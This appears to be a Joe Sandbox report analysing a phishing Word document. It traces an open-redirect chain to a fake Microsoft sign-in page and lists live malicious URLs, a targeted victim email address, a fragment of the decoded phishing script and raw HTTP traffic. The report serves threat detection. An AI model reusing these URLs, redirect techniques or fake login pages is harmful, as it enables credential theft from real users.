Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NoteID [4962398] _Secure_Document_Mrettinger-46568.docx

Overview

General Information

Sample name:NoteID [4962398] _Secure_Document_Mrettinger-46568.docx
Analysis ID:1557885
MD5:4ef613368d8ef55921e44d21e92b817a
SHA1:11b679e827ded5df7e6b115800cfe79847fbba5b
SHA256:31712310b311a29b04380f8056ae5123b413a43f9eda5d399997d4da9f143d79
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Yara detected HtmlPhish10
AI detected suspicious URL
Detected use of open redirect vulnerability
Allocates memory with a write watch (potentially for evading sandboxes)
Detected suspicious crossdomain redirect
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Stores files to the Windows start menu directory
Unable to load, office file is protected or invalid

Classification

  • System is w10x64_ra
  • WINWORD.EXE (PID: 6004 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\NoteID [4962398] _Secure_Document_Mrettinger-46568.docx" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  • chrome.exe (PID: 6496 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 6752 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1920,i,2782846156800102121,14241505822711078173,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • Cortana.exe (PID: 8080 cmdline: "C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe" -ServerName:App.AppX2y379sjp88wjq1y80217mddj3fargf2y.mca MD5: 2474F6359B2686EBCC034214ECDA6253)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
2.4.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://timesofvartha.com/favicon.icoAvira URL Cloud: Label: malware
    Source: https://timesofvartha.com/cloudflare-challenge/Avira URL Cloud: Label: malware
    Source: https://bc1qlpk73pgj3dz02nq8d9kpdxk.org/Avira URL Cloud: Label: malware
    Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/Avira URL Cloud: Label: malware
    Source: https://timesofvartha.com/cloudflare-challenge/#Avira URL Cloud: Label: malware
    Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Avira URL Cloud: Label: malware
    Source: https://timesofvartha.com/cdn-cgi/challenge-platform/h/b/rc/8e497d813cb62ff4Avira URL Cloud: Label: malware

    Phishing

    barindex
    Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Mrettinger@dcndx.comJoe Sandbox AI: Score: 7 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'timesofvartha.com' does not match the legitimate domain for Microsoft., The domain 'timesofvartha.com' does not have any known association with Microsoft., The URL does not contain any recognizable elements related to Microsoft, which is suspicious., The input fields labeled as 'unknown' do not provide any context or relevance to Microsoft, increasing suspicion. DOM: 2.4.pages.csv
    Source: Yara matchFile source: 2.4.pages.csv, type: HTML
    Source: EmailJoe Sandbox AI: AI detected Brand spoofing attempt in URL: https://timesofvartha.com
    Source: EmailJoe Sandbox AI: AI detected Typosquatting in URL: https://timesofvartha.com
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Proxy from: r.neurotags.net/?e=email-activity&h=prod&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=read more.&r=https://sepedatua.com/158983/secure-redirect to https://sepedatua.com/158983/secure-redirect
    Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Mrettinger@dcndx.comHTTP Parser: Number of links: 0
    Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Mrettinger@dcndx.comHTTP Parser: <input type="password" .../> found but no <form action="...
    Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Mrettinger@dcndx.comHTTP Parser: Base64 decoded: function gv() {var vrs = {};var ps = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m, key, value) {vrs[key] = value;});return vrs;}let cfg = gv()['cfg'];if (typeof cfg === 'undefined'){cfg ...
    Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Mrettinger@dcndx.comHTTP Parser: Title: Sign in to your account does not match URL
    Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Mrettinger@dcndx.comHTTP Parser: <input type="password" .../> found
    Source: https://timesofvartha.com/cloudflare-challenge/#Mrettinger@dcndx.comHTTP Parser: No favicon
    Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Mrettinger@dcndx.comHTTP Parser: No favicon
    Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Mrettinger@dcndx.comHTTP Parser: No <meta name="author".. found
    Source: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Mrettinger@dcndx.comHTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.17:49700 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49703 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.17:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49751 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49773 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 2.23.209.179:443 -> 192.168.2.17:49775 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49841 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.17:49848 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.108.10.254:443 -> 192.168.2.17:49852 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.108.10.254:443 -> 192.168.2.17:49856 version: TLS 1.2
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: r.neurotags.net to https://sepedatua.com/158983/secure-redirect
    Source: global trafficHTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
    Source: Joe Sandbox ViewIP Address: 13.107.246.44 13.107.246.44
    Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
    Source: Joe Sandbox ViewIP Address: 13.107.246.60 13.107.246.60
    Source: Joe Sandbox ViewIP Address: 154.216.17.193 154.216.17.193
    Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
    Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
    Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
    Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
    Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
    Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
    Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
    Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
    Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
    Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
    Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
    Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
    Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.68
    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ePsK7ZCVA7dfvLb&MD=7twsYf23 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect HTTP/1.1Host: r.neurotags.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /158983/secure-redirect HTTP/1.1Host: sepedatua.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /158983/secure-redirect/ HTTP/1.1Host: sepedatua.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cloudflare-challenge/ HTTP/1.1Host: timesofvartha.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://sepedatua.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://timesofvartha.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://timesofvartha.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://timesofvartha.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e497d813cb62ff4&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: timesofvartha.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://timesofvartha.com/cloudflare-challenge/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e497d813cb62ff4&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1934195006:1731948353:unz671KSRq1ToGyOHQQkK3w4rNHjodEQ7ar4OrQ9NOM/8e497d813cb62ff4/MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8e497d813cb62ff4/1731948951564/p8JSJGxodSL51Dr HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8e497d813cb62ff4/1731948951564/p8JSJGxodSL51Dr HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8e497d813cb62ff4/1731948951576/044ddceecbee23a905e087f0dcbf9c62295d312b4bb3ef95c5855d29fd2991d0/qFAA1Rd1fZGxcNU HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1934195006:1731948353:unz671KSRq1ToGyOHQQkK3w4rNHjodEQ7ar4OrQ9NOM/8e497d813cb62ff4/MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1934195006:1731948353:unz671KSRq1ToGyOHQQkK3w4rNHjodEQ7ar4OrQ9NOM/8e497d813cb62ff4/MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /auth-signin-apibridge_481736uyg7y73hdui21/ HTTP/1.1Host: timesofvartha.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://timesofvartha.com/cloudflare-challenge/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://timesofvartha.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
